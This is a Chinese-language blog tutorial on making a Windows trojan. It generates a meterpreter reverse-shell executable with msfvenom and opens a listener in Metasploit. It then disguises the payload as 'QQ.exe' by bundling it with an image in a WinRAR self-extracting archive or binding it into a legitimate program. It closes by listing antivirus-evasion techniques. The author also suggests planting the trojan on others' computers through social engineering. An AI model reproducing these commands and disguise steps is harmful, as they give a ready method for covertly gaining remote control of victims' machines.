木马与免杀初探

生成木马

使用 msfvenom 生成一个木马

image 112 - 木马与免杀初探

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.15.137
lport=7777 -f exe -o reverse_tcp.exe

  • Options:
  •     -p, --payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定
  •     -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
  •     -n, --nopsled    <length>        为payload预先指定一个NOP滑动长度
  •     -f, --format     <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
  •     -e, --encoder    [encoder]       指定需要使用的encoder(编码器)
  •     -a, --arch       <architecture>  指定payload的目标架构
  •         --platform   <platform>      指定payload的目标平台
  •     -s, --space      <length>        设定有效攻击荷载的最大长度
  •     -b, --bad-chars  <list>          设定规避字符集,比如: '\x00\xff'
  •     -i, --iterations <count>         指定payload的编码次数
  •     -c, --add-code   <path>          指定一个附加的win32 shellcode文件
  •     -x, --template   <path>          指定一个自定义的可执行文件作为模板
  •     -k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行
  •         --payload-options            列举payload的标准选项
  •     -o, --out   <path>               保存payload
  •     -v, --var-name <name>            指定一个自定义的变量,以确定输出格式
  •         --shellest                   最小化生成payload
  •     -h, --help                       查看帮助选项
  •         --help-formats               查看msf支持的输出格式列表
  • lhost 指定接受shell的ip
  • lport 反弹shell的端口

生成好木马后进入msf

设置侦听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lport 4444

set lhost 192.168.15.137

exploit

image 93 - 木马与免杀初探

随后利用社工等办法 把该木马放到别人电脑上并执行 这里我使用的自己的主机来当肉鸡

image 95 - 木马与免杀初探

查看kail端

image 96 - 木马与免杀初探

得到shell

木马捆绑

1、winrar自解压捆绑木马

将一张图片和木马 捆绑在一起 生成一个图标

image 97 - 木马与免杀初探

同时选择图片和木马 右键 选择添加到压缩文件

可以发现压缩的文件名为exe可执行后缀 修改名称为QQ.exe 右边带年纪创建自解压格式压缩文件

image 98 - 木马与免杀初探

随后点击高级→自解压选项

image 99 - 木马与免杀初探

解压路径选择D盘

image 101 - 木马与免杀初探

点击设置 在设置程序中设置解压后先运行我们的木马在运行我们压缩的图片

image 104 - 木马与免杀初探

在文本和图标中选择我们需要的图标点击打开即可

image 103 - 木马与免杀初探

最后生成了一个如下的程序

image 108 - 木马与免杀初探

在kail端设置侦听

image 109 - 木马与免杀初探

点击运行QQ.exe

image 110 - 木马与免杀初探

点击安装

弹出一张图片同时kail端返回meteroreter

image 111 - 木马与免杀初探

2、msfvenom捆绑木马与程序

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.15.137
lport=4444 –x 123.exe –k -f exe -o QQ.exe

使用msf将计算器与木马进行捆绑

image 1 - 木马与免杀初探

将木马放入到物理机中

点击JSQ1.exe发现kail得到shell

image 2 - 木马与免杀初探

木马免杀

免杀方法:
1.编码
2.加壳(压缩算法)脱壳
3.先生成c源码,再编译成exe
4.利用工具(Veil,TheFatRat等)

apisix未授权访问(CVE-2021-45232)

上一篇

wireshark简单使用&常见webshell管理工具的流量分析

下一篇
评论
发表评论 说点什么
还没有评论
205